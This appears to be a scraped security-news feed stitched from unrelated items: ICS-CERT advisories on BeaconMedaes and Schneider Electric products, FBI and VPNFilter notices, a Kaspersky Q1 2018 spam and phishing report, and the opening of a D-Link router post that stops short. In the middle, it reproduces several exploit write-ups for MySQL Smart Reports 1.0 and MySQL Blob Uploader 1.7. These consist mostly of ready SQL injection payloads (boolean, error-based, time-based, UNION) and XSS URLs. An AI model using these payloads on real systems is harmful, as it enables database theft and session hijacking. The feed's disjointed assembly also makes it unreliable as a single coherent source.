BeaconMedaes TotalAlert Scroll Medical Air Systems

1. EXECUTIVE SUMMARY

  • CVSS v3 7.5

  • ATTENTION: Exploitable remotely/low skill level to exploit
  • Vendor: BeaconMedaes
  • Equipment: TotalAlert Scroll Medical Air Systems web application
  • Vulnerabilities: Improper Access Control, Insufficiently Protected Credentials, Unprotected Storage of Credentials

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could allow an attacker to view and potentially modify some device information and web application setup information, which does not include access to patient health information. Additionally, BeaconMedaes has stated that a successful attacker would not be able to affect the ability of the device to operate as designed for the purpose of delivering medical air in compliance with the NFPA 99 standard for healthcare facilities.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following TotalAlert Scroll Medical Air Systems web applications are affected:

  • TotalAlert Scroll Medical Air Systems running software Versions 4107600010.23 and prior.

3.2 VULNERABILITY OVERVIEW

3.2.2   INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522

An attacker with network access to the integrated web server could retrieve default or user defined credentials stored and transmitted in an insecure manner.

CVE-2018-7518 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

3.2.3   UNPROTECTED STORAGE OF CREDENTIALS CWE-256

Passwords are presented in plaintext in a file that is accessible without authentication.

CVE-2018-7515 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

3.3 BACKGROUND

  • Critical Infrastructure Sectors: Healthcare and Public Health
  • Countries/Areas Deployed: Worldwide
  • Company Headquarters Location: U.S.

3.4 RESEARCHER

Maxim Rupp reported these vulnerabilities to NCCIC.

4. MITIGATIONS

BeaconMedaes has stated that the vulnerabilities do not compromise either patient health information or compliance with the NFPA 99 standard for healthcare facilities. To address these vulnerabilities, BeaconMedaes has created update 4107600010.24 and recommends that users of the TotalAlert Scroll Medical Air Systems update to this version or the latest release. BeaconMedaes recommends that affected users reach out to BeaconMedaes directly at 1-888-4MEDGAS (463-3427) to obtain this update.

NCCIC recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

NCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.

No known public exploits specifically target these vulnerabilities.

Schneider Electric Floating License Manager

1. EXECUTIVE SUMMARY

  • CVSS v3 9.8

  • ATTENTION: Remotely exploitable/low skill level to exploit
  • Vendor: Schneider Electric
  • Equipment: Floating License Manager
  • Vulnerabilities: Heap-based Buffer Overflow, Improper Restriction of Operations within the Bounds of a Memory Buffer, Open Redirect

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could cause a denial of service, allow arbitrary execution of code with system level privileges, or send users to arbitrary websites.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following products use the vulnerable Schneider Electric Floating License Manager, a license management platform:

  • SCADA Expert Vijeo Citect / CitectSCADA Version 7.30, 7.40,
  • CitectSCADA Version 2015, 2016,
  • Vijeo Historian/CitectHistorian Version 4.40, 4.50,
  • CitectHistorian Version 2016,
  • Citect Anywhere,
  • PlantStruxure PES V4.3 SP1 and prior, and
  • EcoStruxure Modicon Builder V3.0 and prior.

The following products are only affected by CVE-2016-10395:

  • EcoStruxure Power Monitoring Expert 8.2 (Standard, DC, HC Editions),
  • StruxureWare Power Monitoring Expert 8.1 (Standard, DC, HC Editions),
  • StruxureWare Power Monitoring Expert 8.0 (Standard, DC, HC, Buildings Editions),
  • StruxureWare Power Monitoring Expert 7.2.x,
  • Energy Expert 1.x (formerly Power Manager), and
  • EcoStruxure Power SCADA Operations 8.x (formerly PowerSCADA Expert) (Only with Advanced Reports and Dashboards Module).

3.2 VULNERABILITY OVERVIEW

3.2.1 HEAP-BASED BUFFER OVERFLOW CWE-122

OpenSSL incorrectly uses pointer arithmetic for heap-buffer boundary checks, which may allow denial of service attacks or other unspecified behavior.

CVE-2016-2177 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

3.2.2 IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119

This vulnerability can be exploited to cause an out-of-bounds memory read access, which may allow remote code execution with system privileges.

CVE-2016-10395 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

3.2.3 URL REDIRECTION TO UNTRUSTED SITE (‘OPEN REDIRECT’) CWE-601

An open redirect vulnerability has been identified, which may allow remote attackers to redirect users to arbitrary websites for phishing attacks.

CVE-2017-5571 has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

3.3 BACKGROUND

  • Critical Infrastructure Sectors: Commercial Facilities, Energy, Food and Agriculture, Government Facilities, Transportation Systems, Water and Wastewater Systems
  • Countries/Areas Deployed: Worldwide
  • Company Headquarters Location: France

3.4 RESEARCHER

Schneider Electric reported these vulnerabilities to NCCIC.

4. MITIGATIONS

Schneider Electric recommends that users of affected Citect and PlantStruxure products download and install the new version of the software located at:

https://www.citect.schneider-electric.com/documents/downloads/Floating_License_Manager_v2.1.0.0.zip

Users using EcoStruxure Modicon Builder V3.0 are recommended to download and use the new version (V3.1) located at:

https://partner.schneider-electric.com/partners/Menu/MyPartnership (login required)

StructureWare 7.2.x users should upgrade to Version 7.2.2 and apply the floating licensing manager (FLM) patch from the following location:

https://schneider-electric.box.com/s/n2fh1ym594pqvl87kf0zjsigamuryrje

EcoStruxure/StruxureWare Power Monitoring Expert and Power SCADA Operations users need to upgrade to Version 8.2. Energy Expert users need to upgrade to Version 1.3. Once these are upgraded apply the Cumulative Update (CU) 2 located at:

https://schneider-electric.box.com/s/kkdikodcksjj1dznqy68ko0j28wct7vb

Schneider Electric has also released security notifications which contain further details and upgrade instructions at the following links:

https://www.citect.schneider-electric.com/safety-and-security-central/36-security-notifications/9134-vulnerabilities-within-schneider-electric-floating-license-manager

https://www.schneider-electric.com/en/download/document/SEVD-2018-137-01/

https://www.schneider-electric.com/en/download/document/SEVD-2018-144-01/

https://www.schneider-electric.com/en/download/document/SEVD-2018-046-01/

NCCIC recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

NCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.

No known public exploits specifically target these vulnerabilities.

FBI Releases Article on Building a Digital Defense with Credit Reports

Original release date: May 23, 2018

FBI has released an article on using credit reports to build a digital defense against identify theft. FBI explains how identity theft can deal a devastating blow to consumers’ credit history. However, regularly checking the accuracy of credit reports can help consumers minimize risk.

NCCIC encourages consumers to review the FBI Article and NCCIC’s Tip on Preventing and Responding to Identity Theft.


This product is provided subject to this Notification and this Privacy & Use policy.

MySQL Smart Reports 1.0 Cross Site Scripting / SQL Injection

# Exploit Title: MySQL Smart Reports 1.0 – SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-smart-reports-online-report-generator-with-existing-data/16836503
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : It is actually a post request sent by the user to update.
You do not need to use post data. You can injection like
GET method.
====================================================

# PoC : SQLi :

Parameter : id

Type : boolean-based blind
Demo :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1
Payload : add=true&id=9′ RLIKE (SELECT (CASE WHEN (8956=8956) THEN 9 ELSE
0x28 END))– YVFC

Type : error-based
Demo :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1
Payload : add=true&id=9′ AND (SELECT 3635 FROM(SELECT
COUNT(*),CONCAT(0x716a6a7671,(SELECT
(ELT(3635=3635,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)– HEMo

Type : AND/OR time-based blind
Demo :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1
Payload : add=true&id=9′ AND SLEEP(5)– mcFO

====================================================
# PoC : XSS :

Payload :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=’
</script><script>alert(1)</script>a;

VPNFilter Destructive Malware

Original release date: May 23, 2018

NCCIC is aware of a sophisticated modular malware system known as VPNFilter. Devices known to be affected by VPNFilter include Linksys, MikroTik, NETGEAR, and TP-Link networking equipment, as well as QNAP network-attached storage (NAS) devices. Devices compromised by VPNFilter may be vulnerable to the collection of network traffic (including website credentials), as well as the monitoring of Modbus supervisory control and data acquisition (SCADA) protocols.

VPNFilter has a destructive capability that can make the affected device unusable. Because the malware can be triggered to affect devices individually or multiple devices at once, VPNFilter has the potential to cut off internet access for hundreds of thousands of users.

NCCIC encourages users and administrators to review the Cisco blog post on VPNFilter for recommendations and to ensure that their devices are updated with the latest patches. NCCIC will provide updated information as it becomes available.


This product is provided subject to this Notification and this Privacy & Use policy.

MySQL Blob Uploader 1.7 Cross Site Scripting / SQL Injection

————————-
Exploit 1 of 4:

# Exploit Title: MySQL Blob Uploader 1.7 – ‘download.php’ SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 – seventh update
# Category: Webapps
# Tested on: Kali linux
====================================================

# PoC : SQLi :

Parameter : id

Type : boolean-based blind
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44′ AND 4775=4775 AND ‘yvnT’=’yvnT&t=files

Type : error-based
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44′ AND (SELECT 7995 FROM(SELECT
COUNT(*),CONCAT(0x71766b7071,(SELECT
(ELT(7995=7995,1))),0x71786b7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘VOHb’=’VOHb&t=files

Type : AND/OR time-based blind
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44′ AND SLEEP(5) AND ‘GnhY’=’GnhY&t=files

Type : UNION query
Demo :
http://test.com/EasyFileUploader/settings-users-edit.php?id=1
Payload : id=-9508′ UNION ALL SELECT
NULL,NULL,NULL,NULL,CONCAT(0x71766b7071,0x6267544b5552795353544744426577526b47544d477553476d576442544152546e4a456b586c726d,0x71786b7671),NULL–
wxis&t=files

Parameter : t

Type : boolean-based blind
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44&t=files` WHERE 6575=6575 AND 6608=6608#

Type : error-based
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44&t=files` WHERE 5293=5293 AND (SELECT 1625 FROM(SELECT
COUNT(*),CONCAT(0x71766b7071,(SELECT
(ELT(1625=1625,1))),0x71786b7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)– OpVv

Type : AND/OR time-based blind
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44&t=files` WHERE 6736=6736 AND (SELECT * FROM
(SELECT(SLEEP(5)))GjCP)– UaZE

====================================================

# PoC : XSS :

Payload(1) :
http://test.com/MySqlBlobUploader/download.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98;&t=files

Payload(2) :
http://test.com/MySqlBlobUploader/download.php?id=44&t=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98
;

————————-
Exploit 2 of 4:

# Exploit Title: MySQL Blob Uploader 1.7 – ‘home-file-edit.php’ SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 – seventh update
# Category: Webapps
# Tested on: Kali linux
====================================================

# PoC : SQLi :

Parameter : id

Type : boolean-based blind
Demo :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=42
Payload : id=42′ AND 5445=5445 AND ‘xkCg’=’xkCg

Type : error-based
Demo :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=42
Payload : id=42′ AND (SELECT 8740 FROM(SELECT
COUNT(*),CONCAT(0x7178717671,(SELECT
(ELT(8740=8740,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘xWJA’=’xWJA

Type : AND/OR time-based blind
Demo :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=42
Payload : id=42′ AND SLEEP(5) AND ‘eOfO’=’eOfO

Type : UNION query
Demo :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=42
Payload : id=-4824′ UNION ALL SELECT
CONCAT(0x7178717671,0x4e4448494b6a6457474572704c5a73534661474c6f6b44554a7863754d77565570654c664a634274,0x717a6b7171),NULL,NULL,NULL,NULL,NULL–
aTGd

====================================================

# PoC : XSS :

Payload :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98;&t=files

————————-
Exploit 3 of 4:

# Exploit Title: MySQL Blob Uploader 1.7 – ‘home-filet-edit.php’ SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 – seventh update
# Category: Webapps
# Tested on: Kali linux
====================================================

# PoC : SQLi :

Parameter : id

Type : boolean-based blind
Demo :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7
Payload : id=7′ AND 3132=3132 AND ‘erLO’=’erLO

Type : error-based
Demo :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7
Payload : id=7′ AND (SELECT 6373 FROM(SELECT
COUNT(*),CONCAT(0x71717a6b71,(SELECT
(ELT(6373=6373,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘JvQj’=’JvQj

Type : AND/OR time-based blind
Demo :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7
Payload : id=7′ AND SLEEP(5) AND ‘MvuE’=’MvuE

Type : UNION query
Demo :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7
Payload : id=-3399′ UNION ALL SELECT
CONCAT(0x71717a6b71,0x6d54504e42544e4b6e6b7a6661595a6a73546d6d4563546554615368546a4a4e4e7a6d6279515672,0x716b706a71),NULL,NULL,NULL,NULL,NULL,NULL–
EcgK

====================================================

# PoC : XSS :

Payload :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98
;

————————-
Exploit 4 of 4:

# Exploit Title: MySQL Blob Uploader 1.7 – ‘home-filet-edit.php’ SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 – seventh update
# Category: Webapps
# Tested on: Kali linux

# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload:

id=7′ AND 3132=3132 AND ‘erLO’=’erLO

# Type: error-based
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload:

id=7′ AND (SELECT 6373 FROM(SELECT
COUNT(*),CONCAT(0x71717a6b71,(SELECT
(ELT(6373=6373,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘JvQj’=’JvQj

# Type: AND/OR time-based blind
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload:

id=7′ AND SLEEP(5) AND ‘MvuE’=’MvuE

# Type: UNION query
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload:

id=-3399′ UNION ALL SELECT
CONCAT(0x71717a6b71,0x6d54504e42544e4b6e6b7a6661595a6a73546d6d4563546554615368546a4a4e4e7a6d6279515672,0x716b706a71),NULL,NULL,NULL,NULL,NULL,NULL–
EcgK

Spam and phishing in Q1 2018

Quarterly highlights

Data leaks

Early 2018 will be remembered for a series of data leak scandals. The most high-profile saw Facebook CEO Mark Zuckerberg grilled by US Congress, with many public figures supporting the Delete Facebook campaign. As a result, Zuckerberg promised to get tough and make it more difficult to harvest data from third-party apps.

But the buck doesn’t stop entirely with the tech giants—personal data often ends up in cybercriminal hands due to user carelessness. Some techniques may be timeworn, but one in particular still reels in the victims: Facebook users are one of the juiciest targets for cyberfraudsters looking to launch mass phishing attacks. Last year Facebook was one of the Top 3 most exploited company names. The schemes are numerous, but fairly standard: the user is asked to “verify” an account or lured into signing into a phishing site on the promise of interesting content.

Examples of phishing pages mimicking Facebook login

Fake pages such as these exist in all languages ​​supported by the social media. Sometimes the correct localization is selected automatically based on the victim’s IP address.

Example of code used by cybercriminals to determine the victim’s location and adapt the phishing page

Data often falls into the hands of cybercriminals through third-party apps that users themselves give access to their accounts and sometimes even allow to post messages on their own behalf.

In early March, for instance, several hundred VKontakte users were hit when third parties gained access to their private correspondence. This happened as a result of apps using the social network’s open API to request access to personal data without guaranteeing its safe storage and use.

In the headline-grabbing case of Cambridge Analytica’s This Is Your Digital Life app, users also handed over personal information voluntarily. Carelessness is the culprit: many people are unaware of just how much data they give away in personality quizzes.

Social media quizzes often ask for a lot of user data,

Remember that cybercriminals often use social media to spread malicious content. For example, we wrote about fake airline giveaways, adult video spam, and even an Alberto Suárez phishing petition.

Another major personal data story was the appearance in Russia of the GetContact app for smartphones, which not only tells users who’s calling, but shows the names under which their contacts are saved in other app users’ phone books. For this, the program needs to be fed not just the user’s own data, but the entire address book (photos, email addresses, even conversation history). That earned GetContact a ban in several countries (even before it appeared in Russia).

Telegram, ICOs, cryptocurrencies

In Q1 a battle royale broke out over the Telegram messenger. It all began late last year with talk of an upcoming ICO. That provided the backdrop for cybercriminals to create, which by the end of Q1 had allegedly raked in as much as the company’s rumored private ICO.

Fake site offering the chance to participate in the Telegram ICO

That was followed by a wave of phishing mailshots to owners of major Russian channels in Telegram. An account under the name Telegram (or something similar) sent a message informing potential victims that suspicious activity had been detected on their account and that confirmation was required to avoid having it blocked. A link was provided to a phishing site masquerading as the login page for the web version of Telegram.

Phishing site mimicking the web version of the Telegram app

If the victim agreed to fill out the form, the cybercriminals gained access to their account, plus the ability to link it to another phone number.

Another spike in scamming activity was recorded when the Internet was buzzing about the imminent takedown of the messenger in Russia. And when the messenger suffered a power outage in a server cluster, it was widely perceived as the start of the ban. Replying to Pavel Durov’s tweet about the malfunction, enterprising cybercriminals offered compensation on his behalf in cryptocurrency. To claim it, users had to follow a link to a site where they were asked to transfer a sum of money to a specified wallet number to receive their “compensation.”

But Telegram does not have a monopoly over the cryptocurrency topic this quarter. We repeatedly encountered phishing sites and email messages exploiting the launch of new ICOs. Cryptocurrency scams often bring in millions of dollars, which explains why cybercriminals are so fond of them.

For instance, on January 31–February 2 the Bee Token startup held an ICO for which participants had to register in advance on the project website, specifying their email address. Cybercriminals managed to get hold of a list of email addresses of potential investors and send out a timely invitation containing e-wallet details for making Ethereum-based investments.

Phishing email supposedly sent from the ICO organizers

123,3275 ether were transferred to this wallet (around $84,162.37). Fraudsters also set up several phishing sites under the guise of the platform’s official site.

A similar scam occurred with the Buzzcoin ICO. The project website invited users to subscribe to a newsletter by leaving an email address. The day before the official ICO start, subscribers received a fraudulent message about the start of pre-sales with a list of cryptowallets to which money should be transferred.

Phishing email supposedly sent from the ICO organizers

Cybercriminals scooped about $15,000 before the organizers took action.

GDPR

One measure that addresses user safety is the General Data Protection Regulation (GDPR), a general policy on the protection and privacy of individuals. This EU regulation has a direct bearing on all companies that process data belonging to EU residents, and therefore has an international scope. The GDPR becomes enforceable on May 25 this year and stipulates large fines (up to EUR 20 million or 4% of annual revenue) for companies whose information activity does not comply with the regulation.

Such a landmark event in the IT world could hardly fail to attract cybercriminals, and in recent months (since the end of last year) we have registered a large number of spam emails related one way or another to the GDPR. It is generally B2B spam—mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business.

We also came across spam offers to install on the target company’s main website or landing page special fee-based software providing web resources with everything necessary to comply with the new rules. Moreover, the site owner would supposedly be insured against problems relating to user data security.

Spam traffic also contained offers to acquire ready-made specialized databases of individuals and legal entities broken down by business division or other criteria. The sellers had no scruples about stressing that all addresses and contacts for sale were already GDPR-compliant. In fact, harvesting user data and reselling it to third parties without the consent of the owners and data carriers violates not only this regulation, but also the law in general.

Example of a spam message exploiting the GDRP topic

Note that legitimate mailers also became more active. They are already sending notices to users describing the new rules and asking for consent to use and process their data under the new policy. When the new regulation enters into force, the number of such notices will skyrocket, so we predict a surge in scam mailings aimed at obtaining personal info and authentication data for access to various accounts. We urge users to pay close attention to the new regulation and carefully study any notifications related to it. Links should be checked before clicking: they should not contain redirects to third-party sites or domains unrelated to the service on whose behalf the message was sent.

Political spam

In the runup to the Russian presidential elections, we observed a range of political spam, including messages promoting or slurring various candidates. The election topic was used for fraud: cybercriminals sent email messages offering a financial reward for taking part in public opinion polls, as a result of which money ended up being transferred in the opposite direction.

Example of a message inviting recipients to take part in a poll

Phishing for taxpayers

Every country has its own tax year, but as a rule the most active period for dealing with tax services comes at the start of the year. In Q1 we registered many phishing pages mimicking the IRS, HMRC, and other countries’ tax services.

Fake tax service websites

Spam-based malware

Back in Q1 2017 we wrote about a mailout disguised as a resume concealing a malicious file from the Fareit Trojan spyware family. The same quarter 2018, cybercriminals attempted to infect users’ computers with the Smoke Loader  backdoor, also known as Dofoil. Its toolbox includes downloading and installing malware such as cryptocurrency miners, banking Trojans, and ransomware. Smoke Loader could also disable some antivirus software and hide from detection by integrating itself into system processes.

The text of the malicious mailshot varied, with some messages imitating the business correspondence of real company employees. To open the password-protected DOC attachment, the user had to enter the password specified in the message, which triggered a request to enable macros (disabled by default); confirmation proved fatal for message recipients. We observed a trend for password-protected malicious attachments in Q1 2018: such protection hinders detection and increases the chances that the message will reach the recipient.

Examples of emails with malicious attachments

Another long-established social engineering method exploits user fears of infection, data leakage, access denial, and other bugbears. In Q1, this old trick was used to dupe users into parting with cryptocurrency. Most messages tried to scare recipients by reporting that malware was installed on their computer and that personal info (lists of contacts, monitor screenshots, webcam videos, etc.) was compromised. If the scammers didn’t receive a hush payment, it was said, the harvested information would be sent to all the victim’s contacts.

Example of a message with a ransom demand in exchange for not publicizing the victim’s personal data

Some messages from cybercriminals tried not only to extract money, but to install malware on recipients’ computers. The malware was located in a protected archive attachment that the attackers claimed was proof that they had the victim’s data.

Malware under the guise of proving cybercriminal intent

Statistics: spam

Proportion of spam in email traffic

Proportion of spam in global email traffic, Q4 2017 and Q1 2018

In Q1 2018, the largest share of spam was recorded in January (54.50%). The average share of spam in global email traffic was 51.82%, down 4.63 p.p. against the figure for Q4 2017

Sources of spam by country

Sources of spam by country, Q1 2018

Q1 2018 results put Vietnam (9.22%) top of the leaderboard of spam sources by country. In second place, just 0.64 p.p. behind, came the US (8.55%). The rating’s frequent leader China (7.87%) slipped to third, while India (7.10%) and Germany (6.35%) claimed fourth and fifth. The Top 10 is rounded off by Iran (2.51%).

Spam email size

Spam email size, Q4 2017 and Q1 2018

In Q1 2018, the share of very small emails (up to 2 KB) in spam increased by 19.79 p.p. to 81.62%. Meanwhile,the proportion of emails between 5 and 10 KB in size fell (by 6.05 p.p.) against the previous quarter to 4.11%.

The number of emails between 10 and 20 KB also decreased (by 4.91 p.p.). Likewise, there were fewer emails sized 20 to 50 KB—this quarter they made up just 2.72% of the total, which represents a drop of 6.81 p.p. compared to the previous reporting period.

Malicious attachments in email

Top 10 malware families

Top 10 malware families, Q1 2018

The most widespread malware family in email traffic this quarter was Trojan-PSW.Win32.Fareit (7.01%), with Backdoor.Java.QRat (6.71%) and Worm.Win32.WBVB (5.75%) completing the Top 3. Fourth place went to Backdoor.Win32.Androm (4.41%), and Trojan.PDF.Badur (3.56%) rounds off the Top 5.

Countries targeted by malicious mailshots

Distribution of Mail Anti-Virus triggers by country, Q1 2018

Germany (14.67%) was this quarter’s leader by number of Mail Anti-Virus triggers, followed by Russia on 6.37% and Britain with a score of 5.43%. Fourth and fifth positions were occupied by Italy (5.40%) and the UAE (4.30%).

Statistics: phishing

In Q1 2018, the Anti-Phishing module prevented 90,245,060 attempts to direct users to scam websites. The share of unique users attacked made up 9.6% of all users of Kaspersky Lab products worldwide.

Geography of attacks

The country with the largest percentage of users affected by phishing attacks in Q1 2018 was Brazil (19.07%, -1.72 p.p.).

Geography of phishing attacks*, Q1 2018

 * Number of users on whose computers Anti-Phishing was triggered as a percentage of the total number of Kaspersky Lab users in that country

Second came Argentina (13.30%), and third place was taken by Venezuela (12.90%). Fourth and fifth went to Albania (12.56%) and Bolivia (12.32%).

Country %
Brazil 19.07
Argentina 13.30
Venezuela 12.90
Albania 12.56
Bolivia 12.32
Réunion 11.88
Belarus 11.62
Georgia 11.56
France 11.40
Portugal 11.26

Top 10 countries by percentage of users attacked by phishers

Organizations under attack

Rating of categories of organizations attacked by phishers

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab’s heuristic Anti-Phishing component.  It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

In Q1 2018, the Global Internet Portals category again took first place with 23.7% (-2.56 p.p.).

Distribution of organizations affected by phishing attacks by category, Q1 2018

However, the combined financial category—banks (18.25%), online stores (17.26%), payment systems (8.41%)—still accounted for almost half of all attacks (43.92%), which is up 4.46 p.p. against the previous quarter . The next categories in descending order were Government Organizations (4.75%), Social Networks and Blogs (4.11%), Telecommunications Companies (2.47%), IT Companies (1.55%), Messengers (0.66%), Online Games (0.43%), and Airlines (0.07%).

Conclusion

The quarter’s main topic, one that we will likely return to many times this year, is personal data. It remains one of the most sought-after wares in the world of information technology for app and service developers, owners of various agencies, and, of course, cybercriminals. Unfortunately, many users still fail to grasp the need to protect their personal information and don’t pay attention to who and how their data is transferred in social media.

Cybercriminal interest in personal data is confirmed by our analysis of spam traffic, where one of the main topics remains mail phishing employing a range of social and technical engineering methods. Throughout the quarter, we observed fake notifications on behalf of social media and popular services, bank phishing, and “Nigerian prince” emails.

The GDPR, set to come on stream in late May, is intended to correct the situation regarding personal data, at least in the EU . Time will tell how effective it is. But one thing is clear: even before its introduction, the new regulation is being actively exploited as a topic by cybercriminals and many others. Regrettably, the GDPR is unlikely to fix the situation.

In Q1 2018, the average share of spam in global email traffic was 51.82%, down 4.63 p.p. against Q4 2017; the Anti-Phishing module blocked 90,245,060 attempts to direct users to fraudulent pages; and Brazil (19.07%, -1.72 p.p.) had the largest share of users attacked by phishers.

Based on the quarter results, it is safe to predict that scammers will continue to exploit “fashionable” topics,  two of which are cryptocurrencies and new ICOs. Given that these topics have begun to attract interest from the general public, a successful attack can reap vast rewards.

Backdoors in D-Link’s backyard

“If you want to change the world, start with yourself.” In the case of security research this can be rephrased to: “If you want to make the world safer, start with the smart things in your home.” Or, to be more specific, start with your router – the core of any home network as well as an interesting research object. And that router you got from your ISP as part of your internet contract is even more interesting when it comes to research.

The impact of vulnerabilities

Note: the following information about vulnerabilities has been submitted to the respective stakeholders (D-Link, ISP provider, Mitre) and we are publishing this information in accordance with vulnerability disclosure policy.

